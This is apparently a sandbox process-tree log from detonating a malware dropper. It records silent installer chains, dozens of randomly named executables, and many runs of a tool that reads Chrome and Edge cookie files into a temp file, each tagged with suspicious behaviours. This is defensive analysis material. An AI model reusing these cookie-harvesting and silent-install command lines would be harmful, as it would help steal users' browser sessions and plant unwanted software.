C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
-
C:\Users\Admin\Documents\aSWJ2lTdFinAaMczKTuOBIYo.exe"C:\Users\Admin\Documents\aSWJ2lTdFinAaMczKTuOBIYo.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 24013⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\znkk3s9soNQXj4w11k0qlFY0.exe"C:\Users\Admin\Documents\znkk3s9soNQXj4w11k0qlFY0.exe"12⤵
-
C:\Users\Admin\Documents\znkk3s9soNQXj4w11k0qlFY0.exe"C:\Users\Admin\Documents\znkk3s9soNQXj4w11k0qlFY0.exe"13⤵
-
-
-
C:\Users\Admin\Documents\fNjsxToitSQAqzHmROaiuKbt.exe"C:\Users\Admin\Documents\fNjsxToitSQAqzHmROaiuKbt.exe"12⤵
-
-
C:\Users\Admin\Documents\twIpHkTz2Hf1ZEytZ0BJc5tL.exe"C:\Users\Admin\Documents\twIpHkTz2Hf1ZEytZ0BJc5tL.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 30013⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"12⤵
-
C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"13⤵
-
-
C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"C:\Users\Admin\Documents\5gWOvGunif11xq2_qwNui978.exe"13⤵
-
-
-
C:\Users\Admin\Documents\JwuwfN8xtYrUPFIXyfOYXYSI.exe"C:\Users\Admin\Documents\JwuwfN8xtYrUPFIXyfOYXYSI.exe"12⤵
-
-
C:\Users\Admin\Documents\j5uYgNe3CAsqgCn4t9HIv_H4.exe"C:\Users\Admin\Documents\j5uYgNe3CAsqgCn4t9HIv_H4.exe"12⤵
-
-
C:\Users\Admin\Documents\lxfLvklOX1kNsvf7HnO5P00g.exe"C:\Users\Admin\Documents\lxfLvklOX1kNsvf7HnO5P00g.exe"12⤵
-
-
C:\Users\Admin\Documents\IhERBeMNJnp4LsAR1xmxYQDh.exe"C:\Users\Admin\Documents\IhERBeMNJnp4LsAR1xmxYQDh.exe"12⤵
-
-
C:\Users\Admin\Documents\uB7blAuXUI5Sa1aXj0EX_7TB.exe"C:\Users\Admin\Documents\uB7blAuXUI5Sa1aXj0EX_7TB.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 28013⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\HgzBkT4OEF98KK64yAd7oW8n.exe"C:\Users\Admin\Documents\HgzBkT4OEF98KK64yAd7oW8n.exe"12⤵
-
C:\Users\Admin\Documents\HgzBkT4OEF98KK64yAd7oW8n.exe"C:\Users\Admin\Documents\HgzBkT4OEF98KK64yAd7oW8n.exe"13⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
-
-
-
-
C:\Users\Admin\Documents\dIeDdD9ZCjp9iSF2mEDI1JuW.exe"C:\Users\Admin\Documents\dIeDdD9ZCjp9iSF2mEDI1JuW.exe"12⤵
-
C:\Users\Admin\Documents\dIeDdD9ZCjp9iSF2mEDI1JuW.exe"C:\Users\Admin\Documents\dIeDdD9ZCjp9iSF2mEDI1JuW.exe"13⤵
-
-
-
C:\Users\Admin\Documents\uTh0geZ3Zfgu4p238N7gtr5n.exe"C:\Users\Admin\Documents\uTh0geZ3Zfgu4p238N7gtr5n.exe"12⤵
-
C:\Users\Admin\Documents\uTh0geZ3Zfgu4p238N7gtr5n.exe"C:\Users\Admin\Documents\uTh0geZ3Zfgu4p238N7gtr5n.exe" -q13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 82014⤵
- Program crash
-
-
-
-
C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"12⤵
-
C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"13⤵
-
C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"15⤵
-
-
-
-
-
C:\Users\Admin\Documents\Hq4T9DUzyPCOMIx1wwP0bHpo.exe"C:\Users\Admin\Documents\Hq4T9DUzyPCOMIx1wwP0bHpo.exe"12⤵
-
C:\Users\Admin\Documents\Hq4T9DUzyPCOMIx1wwP0bHpo.exeC:\Users\Admin\Documents\Hq4T9DUzyPCOMIx1wwP0bHpo.exe13⤵
-
-
-
C:\Users\Admin\Documents\NlF_wpVwwBpBPuBDbqi1L2a9.exe"C:\Users\Admin\Documents\NlF_wpVwwBpBPuBDbqi1L2a9.exe"12⤵
-
-
C:\Users\Admin\Documents\F9QVY_KGotMX33Tl1bomCsrk.exe"C:\Users\Admin\Documents\F9QVY_KGotMX33Tl1bomCsrk.exe"12⤵
-
-
C:\Users\Admin\Documents\kSVpEZsZrc6xemTzPEtUEh6Z.exe"C:\Users\Admin\Documents\kSVpEZsZrc6xemTzPEtUEh6Z.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7748 -s 28013⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\eElh3Su0dPZa_3w1fjZFEThC.exe"C:\Users\Admin\Documents\eElh3Su0dPZa_3w1fjZFEThC.exe"12⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\orlTPdntezZxn17bxIvb6pkT.exe"C:\Users\Admin\Documents\orlTPdntezZxn17bxIvb6pkT.exe"12⤵
-
C:\Users\Admin\Documents\orlTPdntezZxn17bxIvb6pkT.exeC:\Users\Admin\Documents\orlTPdntezZxn17bxIvb6pkT.exe13⤵
-
-
-
C:\Users\Admin\Documents\2bF44xcr5OAcMGEVGthhnKfj.exe"C:\Users\Admin\Documents\2bF44xcr5OAcMGEVGthhnKfj.exe"12⤵
-
-
C:\Users\Admin\Documents\REUMgzPPynNrDi1yQtiV9gj4.exe"C:\Users\Admin\Documents\REUMgzPPynNrDi1yQtiV9gj4.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5904 -s 29613⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Tsmqh1CXm2mQo5pM5kyRfelS.exe"C:\Users\Admin\Documents\Tsmqh1CXm2mQo5pM5kyRfelS.exe"12⤵
-
-
C:\Users\Admin\Documents\jdhL2e7gb1rObzuAejUw076h.exe"C:\Users\Admin\Documents\jdhL2e7gb1rObzuAejUw076h.exe"12⤵
-
C:\Users\Admin\Documents\jdhL2e7gb1rObzuAejUw076h.exeC:\Users\Admin\Documents\jdhL2e7gb1rObzuAejUw076h.exe13⤵
-
-
-
C:\Users\Admin\Documents\FNHAQbBbFV7fJDxfFbFKZ4ec.exe"C:\Users\Admin\Documents\FNHAQbBbFV7fJDxfFbFKZ4ec.exe"12⤵
-
C:\Users\Admin\Documents\FNHAQbBbFV7fJDxfFbFKZ4ec.exe"C:\Users\Admin\Documents\FNHAQbBbFV7fJDxfFbFKZ4ec.exe"13⤵
-
-
-
C:\Users\Admin\Documents\UkappXwNt0b7f0k6M1h1zYmo.exe"C:\Users\Admin\Documents\UkappXwNt0b7f0k6M1h1zYmo.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BR9DF.tmp\UkappXwNt0b7f0k6M1h1zYmo.tmp"C:\Users\Admin\AppData\Local\Temp\is-BR9DF.tmp\UkappXwNt0b7f0k6M1h1zYmo.tmp" /SL5="$50260,138429,56832,C:\Users\Admin\Documents\UkappXwNt0b7f0k6M1h1zYmo.exe"13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1NV3C.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1NV3C.tmp\Setup.exe" /Verysilent14⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"15⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 /qn CAMPAIGN=""710"" " CAMPAIGN="710"16⤵
-
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\41l1xsq0.3dr\5ea1d8d5ec348a51892bc3f5fed22413.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\41l1xsq0.3dr\5ea1d8d5ec348a51892bc3f5fed22413.exeC:\Users\Admin\AppData\Local\Temp\41l1xsq0.3dr\5ea1d8d5ec348a51892bc3f5fed22413.exe11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 27612⤵
- Program crash
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ia3umz0k.u0z\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ia3umz0k.u0z\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ia3umz0k.u0z\gcleaner.exe /mixfive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 27612⤵
- Program crash
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ek1yc44k.kxr\app.exe /8-2222 & exit10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ek1yc44k.kxr\app.exeC:\Users\Admin\AppData\Local\Temp\ek1yc44k.kxr\app.exe /8-222211⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 27612⤵
- Program crash
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l2gexgme.cxw\installer.exe /qn CAMPAIGN=654 & exit10⤵
- Blocklisted process makes network request
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\l2gexgme.cxw\installer.exeC:\Users\Admin\AppData\Local\Temp\l2gexgme.cxw\installer.exe /qn CAMPAIGN=65411⤵
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 8528⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"6⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"6⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"7⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"6⤵
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\D4nZnvKuGza1oWNPIEDPRme3.exe"C:\Users\Admin\Documents\D4nZnvKuGza1oWNPIEDPRme3.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\D4nZnvKuGza1oWNPIEDPRme3.exeC:\Users\Admin\Documents\D4nZnvKuGza1oWNPIEDPRme3.exe8⤵
-
-
-
C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"8⤵
-
C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"9⤵
-
C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"10⤵
-
-
-
-
-
C:\Users\Admin\Documents\J2UMrXJ_91PPJWQrvcPYy29P.exe"C:\Users\Admin\Documents\J2UMrXJ_91PPJWQrvcPYy29P.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\J2UMrXJ_91PPJWQrvcPYy29P.exe"C:\Users\Admin\Documents\J2UMrXJ_91PPJWQrvcPYy29P.exe"8⤵
-
-
-
C:\Users\Admin\Documents\7s2ZdHDbdc7fmGBQwXncfSTe.exe"C:\Users\Admin\Documents\7s2ZdHDbdc7fmGBQwXncfSTe.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
-
C:\Users\Admin\Documents\8vOzvG7hvLT_vK9OBgVL_Ut5.exe"C:\Users\Admin\Documents\8vOzvG7hvLT_vK9OBgVL_Ut5.exe"7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\vQ3rC0vqvYatBnp35VZuhjBv.exe"C:\Users\Admin\Documents\vQ3rC0vqvYatBnp35VZuhjBv.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\aoTKQWvv37TQbCovU1Z1MQvL.exe"C:\Users\Admin\Documents\aoTKQWvv37TQbCovU1Z1MQvL.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 3008⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\9UKJv1TLGOvmu1y73QBdGQ8c.exe"C:\Users\Admin\Documents\9UKJv1TLGOvmu1y73QBdGQ8c.exe"7⤵
-
C:\Users\Admin\Documents\9UKJv1TLGOvmu1y73QBdGQ8c.exe"C:\Users\Admin\Documents\9UKJv1TLGOvmu1y73QBdGQ8c.exe"8⤵
-
-
-
C:\Users\Admin\Documents\5YwwMGWcE2RgT9bX6bjTmfpN.exe"C:\Users\Admin\Documents\5YwwMGWcE2RgT9bX6bjTmfpN.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\5YwwMGWcE2RgT9bX6bjTmfpN.exeC:\Users\Admin\Documents\5YwwMGWcE2RgT9bX6bjTmfpN.exe8⤵
-
-
-
C:\Users\Admin\Documents\qn2fLFfsyhvD8HKB3M1mdDes.exe"C:\Users\Admin\Documents\qn2fLFfsyhvD8HKB3M1mdDes.exe"7⤵
-
C:\Users\Admin\Documents\qn2fLFfsyhvD8HKB3M1mdDes.exe"C:\Users\Admin\Documents\qn2fLFfsyhvD8HKB3M1mdDes.exe"8⤵
-
-
-
C:\Users\Admin\Documents\hAdmjf27kwz_7TsacCSaTWNP.exe"C:\Users\Admin\Documents\hAdmjf27kwz_7TsacCSaTWNP.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
